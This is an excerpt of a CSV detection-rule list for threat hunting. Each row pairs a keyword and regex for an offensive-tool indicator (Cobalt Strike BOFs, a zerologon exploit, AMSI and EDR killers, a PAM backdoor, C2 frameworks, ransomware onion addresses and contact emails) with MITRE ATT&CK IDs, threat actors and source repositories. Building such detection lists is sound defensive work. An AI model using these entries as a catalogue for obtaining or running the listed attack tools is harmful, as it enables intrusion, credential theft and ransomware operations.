"*ze677xuzard4lx4iul2yzf5ks4gqqzoulgj5u4n5n4bbbsxjbfr7eayd.onion*",".{0,1000}ze677xuzard4lx4iul2yzf5ks4gqqzoulgj5u4n5n4bbbsxjbfr7eayd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes 
archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","63437" "*zed2john.py*",".{0,1000}zed2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","63438" "*zenoss_3x_command_execution*",".{0,1000}zenoss_3x_command_execution.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","63441" "*zeonrefpbompx6rwdqa5hxgtp2cxgfmoymlli3azoanisze33pp3x3yd.onion*",".{0,1000}zeonrefpbompx6rwdqa5hxgtp2cxgfmoymlli3azoanisze33pp3x3yd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","63442" "*zephrax/linux-pam-backdoor*",".{0,1000}zephrax\/linux\-pam\-backdoor.{0,1000}","offensive_tool_keyword","linux-pam-backdoor","Linux PAM Backdoor","T1547.001 - T1556.003","TA0003 - TA0004","N/A","N/A","Persistence","https://github.com/zephrax/linux-pam-backdoor","1","1","#linux","N/A","10","4","328","85","2023-11-13T11:29:44Z","2017-06-08T21:14:34Z","63443" "*ZephrFish/ADFSDump-PS*",".{0,1000}ZephrFish\/ADFSDump\-PS.{0,1000}","offensive_tool_keyword","ADFSDump-PS","ADFSDump to assist with GoldenSAML","T1078 - T1552.004 - T1558.004","TA0006 
","N/A","N/A","Credential Access","https://github.com/ZephrFish/ADFSDump-PS","1","1","N/A","N/A","10","1","31","8","2024-05-20T00:00:19Z","2024-05-19T00:46:28Z","63444" "*ZephrFish/Stompy*",".{0,1000}ZephrFish\/Stompy.{0,1000}","offensive_tool_keyword","Stompy","Timestomp Tool to flatten MAC times with a specific timestamp","T1070.006","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZephrFish/Stompy","1","1","N/A","N/A","10","1","46","6","2023-10-15T17:38:23Z","2023-10-14T23:40:32Z","63445" "*zer0condition/mhydeath*",".{0,1000}zer0condition\/mhydeath.{0,1000}","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","Black Basta","Defense Evasion","https://github.com/zer0condition/mhydeath","1","1","N/A","N/A","10","4","397","71","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z","63446" "*zer0condition/ZeroHVCI*",".{0,1000}zer0condition\/ZeroHVCI.{0,1000}","offensive_tool_keyword","ZeroHVCI","Achieve arbitrary kernel read/writes/function calling in Hypervisor-Protected Code Integrity (HVCI) protected environments calling without admin permissions or kernel drivers - CVE-2024-26229","T1068 - T1564 - T1014 - T1499","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/zer0condition/ZeroHVCI","1","1","N/A","N/A","7","2","198","43","2024-10-26T17:08:38Z","2024-07-20T07:29:18Z","63447" "*zeroday-powershell*",".{0,1000}zeroday\-powershell.{0,1000}","offensive_tool_keyword","zeroday-powershell","This will exploit the Windows operating system allowing you to modify the file Some.dll.","T1203 - T1574.001 - T1546.011","TA0002 - TA0007 - TA0008","N/A","N/A","Exploitation tool","https://github.com/OneLogicalMyth/zeroday-powershell","1","1","N/A","N/A","N/A","4","326","86","2018-09-12T09:03:04Z","2018-09-10T16:34:14Z","63448" "*zerologon clone *https*",".{0,1000}zerologon\sclone\s.{0,1000}https.{0,1000}","offensive_tool_keyword","exegol","Fully featured and 
community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","63449" "*zerologon.py*",".{0,1000}zerologon\.py.{0,1000}","offensive_tool_keyword","POC","Zerologon CVE exploitation","T1210 - T1071","TA0008 - TA0006","N/A","N/A","Exploitation tool","https://github.com/michaelpoznecki/zerologon","1","1","N/A","N/A","N/A","1","10","4","2020-09-15T16:31:59Z","2020-09-15T05:32:24Z","63450" "*zerologon.x64*",".{0,1000}zerologon\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF zerologon exploit","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - 
Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/ZeroLogon-BOF","1","1","N/A","N/A","10","10","158","37","2022-04-25T11:22:45Z","2020-09-17T02:07:13Z","63451" "*zerologon.x86*",".{0,1000}zerologon\.x86.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF zerologon exploit","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/rsmudge/ZeroLogon-BOF","1","1","N/A","N/A","10","10","158","37","2022-04-25T11:22:45Z","2020-09-17T02:07:13Z","63452" "*zerologon_check*",".{0,1000}zerologon_check.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","63453" "*ZeroLogon-BOF*",".{0,1000}ZeroLogon\-BOF.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF zerologon exploit","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 
- Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/ZeroLogon-BOF","1","1","N/A","N/A","10","10","158","37","2022-04-25T11:22:45Z","2020-09-17T02:07:13Z","63454" "*zerologon-restore * -target-ip *",".{0,1000}zerologon\-restore\s.{0,1000}\s\-target\-ip\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","63455" "*ZeroMemoryEx/Amsi-Killer*",".{0,1000}ZeroMemoryEx\/Amsi\-Killer.{0,1000}","offensive_tool_keyword","Amsi-Killer","Lifetime AMSI bypass","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Amsi-Killer","1","1","N/A","N/A","10","7","624","90","2023-09-26T00:49:22Z","2023-02-26T19:05:14Z","63457" "*ZeroMemoryEx/Blackout*",".{0,1000}ZeroMemoryEx\/Blackout.{0,1000}","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","1","N/A","N/A","N/A","10","935","137","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z","63458" "*ZeroPointSecurity/BadWindowsService*",".{0,1000}ZeroPointSecurity\/BadWindowsService.{0,1000}","offensive_tool_keyword","BadWindowsService","An insecurely implemented and installed Windows service for emulating elevation of privileges vulnerabilities","T1068 - T1211 - T1050","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/eladshamir/BadWindowsService","1","1","N/A","N/A","10","1","58","10","2022-08-25T14:22:25Z","2022-08-19T15:38:05Z","63459" "*ZEROSHELL | 
ZEROSTORE*",".{0,1000}ZEROSHELL\s\|\sZEROSTORE.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","N/A","php title webshell","7","10","2536","403","2025-04-22T10:55:49Z","2020-05-13T11:28:52Z","63460" "*zerosum0x0*",".{0,1000}zerosum0x0.{0,1000}","offensive_tool_keyword","zerosum0x0","github repo username hosting backdoors pocs and exploitation tools","N/A","N/A","N/A","N/A","Exploitation tool","https://github.com/zerosum0x0","1","1","N/A","N/A","7","10","N/A","N/A","N/A","N/A","63461" "*zerosum0x0*koadic*",".{0,1000}zerosum0x0.{0,1000}koadic.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","63462" "*zeze-zeze/NamedPipeMaster*",".{0,1000}zeze\-zeze\/NamedPipeMaster.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","1","N/A","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","63463" "*ZGF0YS5mZGEuZ292*",".{0,1000}ZGF0YS5mZGEuZ292.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","#base64","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","63464" "*ZGIuc3NhLmdvdg==*",".{0,1000}ZGIuc3NhLmdvdg\=\=.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - 
TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","#base64","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","63465" "*zha0gongz1*",".{0,1000}zha0gongz1.{0,1000}","offensive_tool_keyword","cobaltstrike","Implement load Cobalt Strike & Metasploit&Sliver shellcode with golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/zha0gongz1/DesertFox","1","0","N/A","N/A","10","10","125","26","2023-02-02T07:02:12Z","2021-02-04T09:04:13Z","63466" 
"*zha0gongz1/DesertFox*",".{0,1000}zha0gongz1\/DesertFox.{0,1000}","offensive_tool_keyword","cobaltstrike","Implement load Cobalt Strike & Metasploit&Sliver shellcode with golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/zha0gongz1/DesertFox","1","1","N/A","N/A","10","10","125","26","2023-02-02T07:02:12Z","2021-02-04T09:04:13Z","63467" "*Ziconius/FudgeC2*",".{0,1000}Ziconius\/FudgeC2.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","63468" "*ziiiiizzzb*",".{0,1000}ziiiiizzzb.{0,1000}","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","N/A","10","10","657","130","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z","63469" "*ziiiiizzzib*",".{0,1000}ziiiiizzzib.{0,1000}","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","N/A","10","10","657","130","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z","63470" "*zip2john *",".{0,1000}zip2john\s.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","63471" "*ZipExec/Cryptor*",".{0,1000}ZipExec\/Cryptor.{0,1000}","offensive_tool_keyword","ZipExec","A unique technique to execute binaries from a password protected zip","T1560.001 - T1204.002 - T1059.005","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Tylous/ZipExec","1","1","N/A","N/A","9","10","1026","153","2022-07-01T16:25:26Z","2021-10-19T21:03:44Z","63472" "*ZipExec/Loader*",".{0,1000}ZipExec\/Loader.{0,1000}","offensive_tool_keyword","ZipExec","A unique technique to execute binaries from a password protected zip","T1560.001 - T1204.002 - T1059.005","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Tylous/ZipExec","1","1","N/A","N/A","9","10","1026","153","2022-07-01T16:25:26Z","2021-10-19T21:03:44Z","63473" "*--ZipFileName $TrustedDomain.zip*",".{0,1000}\-\-ZipFileName\s\$TrustedDomain\.zip.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","63474" "*zippy.nim*",".{0,1000}zippy\.nim.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black 
Basta","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","63475" "*zjoxyw5mkacojk5ptn2iprkivg5clow72mjkyk5ttubzxprjjnwapkad.onion*",".{0,1000}zjoxyw5mkacojk5ptn2iprkivg5clow72mjkyk5ttubzxprjjnwapkad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","63476" "*Zloader-FCVP*",".{0,1000}Zloader\-FCVP.{0,1000}","offensive_tool_keyword","Zloader","Zloader Installs Remote Access Backdoors and Delivers Cobalt Strike","T1059 - T1220 - T1566.001 - T1059.005 - T1218.011 - T1562.001 - T1204","TA0002 - TA0008 - TA0006 - TA0001 - TA0010 - TA0003","N/A","N/A","Exploitation tool","https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A","63477" "*zMarch/Orc*",".{0,1000}zMarch\/Orc.{0,1000}","offensive_tool_keyword","Orc","Orc is a post-exploitation framework for Linux written in Bash","T1059.004 - T1036.005 - T1070.002 - T1012 - T1082 - T1003 - T1555.003 - T1049 - T1134.001 - T1202","TA0005 - TA0003 - TA0002 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/zMarch/Orc","1","1","#linux","N/A","9","4","395","53","2019-11-12T18:21:27Z","2018-08-16T11:31:39Z","63479" "*znhsupport@protonmail.com*",".{0,1000}znhsupport\@protonmail\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","63480" 
